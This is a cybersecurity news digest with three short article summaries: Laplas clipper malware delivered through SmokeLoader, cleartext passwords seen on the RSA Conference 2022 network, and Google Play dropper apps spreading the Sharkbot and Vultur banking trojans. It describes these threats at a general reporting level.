    A new clipper malware strain called Laplas through another malware known as SmokeLoader is targeting cryptocurrency users. According to a Cyble analysis, SmokeLoader, which is delivered via weaponized documents sent by spear-phishing emails, also acts as a conduit for other commodity Trojans such as SystemBC and Raccoon Stealer 2.0. SmokeLoader, seen in the wild since around 2013, functions as a generic loader capable of distributing additional payloads onto compromised systems, such as information-stealing malware and other implants. It was discovered to deploy a backdoor known as Amadey in July 2022. Since October 24, 2022, Cyble has discovered over 180 Laplas samples, indicating a widespread deployment. Clippers, also known as ClipBankers, are a type of malware classified by Microsoft as cryware. They are designed to steal cryptocurrency by monitoring a victim's clipboard activity and replacing the original wallet address, if present, with an attacker-controlled address. The goal of clipper malware such as Laplas is to redirect a virtual currency transaction intended for a legitimate recipient to the threat actor's account. According to the researchers, Laplas is a new clipper malware that generates a wallet address that is similar to the victim's wallet address. The victim will not notice the difference in the address, increasing the likelihood of successful clipper activity. The new clipper malware includes wallet support for Bitcoin, Ethereum, Bitcoin Cash, Litecoin, Dogecoin, Monero, Ripple, Zcash, Dash, Ronin, TRON, Cardano, Cosmos, Tezos, Qtum, and Steam Trade URL. It ranges in price from $59 per month to $549 per year. It also includes its own web panel, which allows purchasers to obtain information about the number of infected computers and active wallet addresses operated by the adversary, as well as add new wallet addresses. This article continues to discuss the new Laplas clipper malware strain.

    THN reports "New Laplas Clipper Malware Targeting Cryptocurrency Users via SmokeLoader"

  • news

    Visible to the public "Unencrypted Traffic Still Undermining Wi-Fi Security"

    The RSA Conference in February taught us that even cybersecurity professionals must improve their security posture. Cisco and NetWitness' Security Operations Center (SOC) captured 55,525 cleartext passwords from 2,210 unique accounts. In one SOC investigation, a chief information security officer had a misconfigured email client that sent passwords and text in the clear. While the number of cleartext passwords is down from 96,361 in 2020 and more than 100,000 in 2019, there is still room for improvement, according to Jessica Bair Oppenheimer, director of technical alliances at Cisco Secure. The RSA Conference 2022 Security Operations Center Findings Report provides insight into network usage among a security-conscious user group. Cisco and NetWitness both stressed that the wireless network at the RSA Conference is not configured to be secure, but rather to be monitored for educational purposes. As a result, the network has a flat architecture, allowing any device on the network to communicate with any other device. Host isolation, which allows devices to connect to the Internet but not to other devices on the network, is more secure but less appealing. The 2022 RSA Conference had roughly half the number of attendees as the previous conference in 2020, but approximately the same number of network users, according to the report. The main problem was that encryption was not used for the authentication step when using email and other popular applications. According to the report, nearly 20 percent of all data passed through the network in the clear. This article continues to discuss key findings from the RSA Conference 2022 Security Operations Center Findings Report.

    Dark Reading reports "Unencrypted Traffic Still Undermining Wi-Fi Security"

  • news

    Visible to the public "Malicious Droppers on Google Play Deliver Banking Malware to Victims"

    To reduce the possibility of downloading malware, Android users are often told to download mobile apps from Google Play, the company's official app marketplace. Google examines apps before releasing them to the public. However, malware distributors continue to find ways around the vetting process. Distribution via droppers on official app stores is still one of the most effective ways for threat actors to reach a large and unsuspecting audience. While other distribution methods are used depending on cybercriminals' targets, resources, and motivation, droppers continue to be one of the best options on a price-efforts-quality ratio, competing with SMiShing, according to Threat Fabric researchers, who recently shared their discovery of several apps on Google Play functioning as droppers for the Sharkbot and Vultur banking Trojans. These trojanized, functional apps, which are typically file managers, file recovery tools, or security two-factor authenticators (2FA), are designed to hide their malicious nature from Google Play Protect, antivirus software, researchers, and users. They provide the advertised functionality, ask for a few common permissions that are not suspicious, and do not contain overtly malicious code. Cleafy researchers recently shared additional information about the evasion techniques of a Vultur Trojan dropper found in three Google Play apps: RecoverFiles, My Finances Tracker, and Zetter Authenticator. This dropper is constantly being improved by the cybercrime team behind the Brunhilda Dropper-as-a-Service (DaaS). The most recent version has a small footprint, requires few permissions, and hides from emulators, sandboxes, and security solutions through steganography, file deletion, string obfuscation, and anti-emulation techniques. According to Threat Fabric researchers, the Sharkbot dropper requests an even smaller set of common permissions and then does not perform the malicious activity if the user is not in a specific geographic location. This article continues to discuss the malicious droppers found on Google Play delivering banking malware to victims.

    Help Net Security reports "Malicious Droppers on Google Play Deliver Banking Malware to Victims"